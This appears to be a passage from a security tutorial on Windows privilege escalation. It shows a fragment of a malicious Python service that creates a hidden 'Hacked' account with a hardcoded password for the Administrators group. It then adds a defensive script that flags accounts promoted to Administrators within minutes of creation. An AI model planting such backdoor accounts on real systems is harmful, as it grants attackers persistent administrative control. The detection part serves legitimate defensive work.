In the previous section, we created a malicious Python service and replaced the legitimate one with it. Once the system had started, we verified that we had obtained SYSTEM or admin privileges. In this section, we'll see how to create a new admin account and then jump from the standard user to that admin account. The only change on the coding side is the following section, added to the previous code, which creates a new admin account once the service starts:
...
USER = "Hacked"
GROUP = "Administrators"
user_info = dict(  # create a user info profile in a dictionary format
    name=USER,
    password="python_is_my_life",  # Define the password for the 'hacked' username
    priv=win32netcon.USER_PRIV_USER,
    home_dir=None,
    comment=None,
    flags=win32netcon.UF_SCRIPT,
...
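From the defender's side, an account created by a service and placed straight into Administrators leaves two Security log records: event 4720 (user account created) followed by event 4732 (member added to a local group). The sketch below is an added example, not code from the original text; the event records are constructed samples, and the helper names `ev` and `find_rapid_admin_creation` and the five-minute window are assumptions made for illustration.

```python
from datetime import datetime, timedelta

SYSTEM_SID = "S-1-5-18"      # LocalSystem, the account a Windows service commonly runs as
ADMINS_SID = "S-1-5-32-544"  # BUILTIN\Administrators

def ev(time, event_id, subject, **fields):
    """Build one constructed record using Security-log field names."""
    return {"TimeCreated": time, "EventID": event_id, "SubjectUserSid": subject, **fields}

# Constructed sample records (SIDs and timestamps are made up).
# 4720 = user account created; 4732 = member added to a security-enabled local group.
EVENTS = [
    ev("2024-01-10T09:00:01", 4720, SYSTEM_SID, TargetUserName="Hacked", TargetSid="S-1-5-21-1-2-3-1005"),
    ev("2024-01-10T09:00:02", 4732, SYSTEM_SID, MemberSid="S-1-5-21-1-2-3-1005", TargetSid=ADMINS_SID),
    # Account created by an administrator and added only to BUILTIN\Users
    ev("2024-01-10T10:15:00", 4720, "S-1-5-21-1-2-3-500", TargetUserName="jsmith", TargetSid="S-1-5-21-1-2-3-1006"),
    ev("2024-01-10T10:15:05", 4732, "S-1-5-21-1-2-3-500", MemberSid="S-1-5-21-1-2-3-1006", TargetSid="S-1-5-32-545"),
    # Account promoted to Administrators two hours after creation (outside the window)
    ev("2024-01-10T11:00:00", 4720, "S-1-5-21-1-2-3-500", TargetUserName="ops2", TargetSid="S-1-5-21-1-2-3-1007"),
    ev("2024-01-10T13:00:00", 4732, "S-1-5-21-1-2-3-500", MemberSid="S-1-5-21-1-2-3-1007", TargetSid=ADMINS_SID),
]

def find_rapid_admin_creation(events, window=timedelta(minutes=5)):
    """Alert on accounts added to Administrators within `window` of being created."""
    created = {}  # account SID -> (creation time, account name, creator SID)
    alerts = []
    for e in sorted(events, key=lambda r: r["TimeCreated"]):
        ts = datetime.fromisoformat(e["TimeCreated"])
        if e["EventID"] == 4720:
            created[e["TargetSid"]] = (ts, e["TargetUserName"], e["SubjectUserSid"])
        elif e["EventID"] == 4732 and e["TargetSid"] == ADMINS_SID:
            hit = created.get(e["MemberSid"])
            if hit and ts - hit[0] <= window:
                alerts.append({
                    "account": hit[1],
                    "seconds_after_creation": int((ts - hit[0]).total_seconds()),
                    # Creation or promotion performed as LocalSystem points at a service
                    "by_system": SYSTEM_SID in (hit[2], e["SubjectUserSid"]),
                })
    return alerts

if __name__ == "__main__":
    for alert in find_rapid_admin_creation(EVENTS):
        print(alert)
```

Only the first pair of records raises an alert; the window is a tuning choice to adjust against how accounts are normally provisioned in the environment.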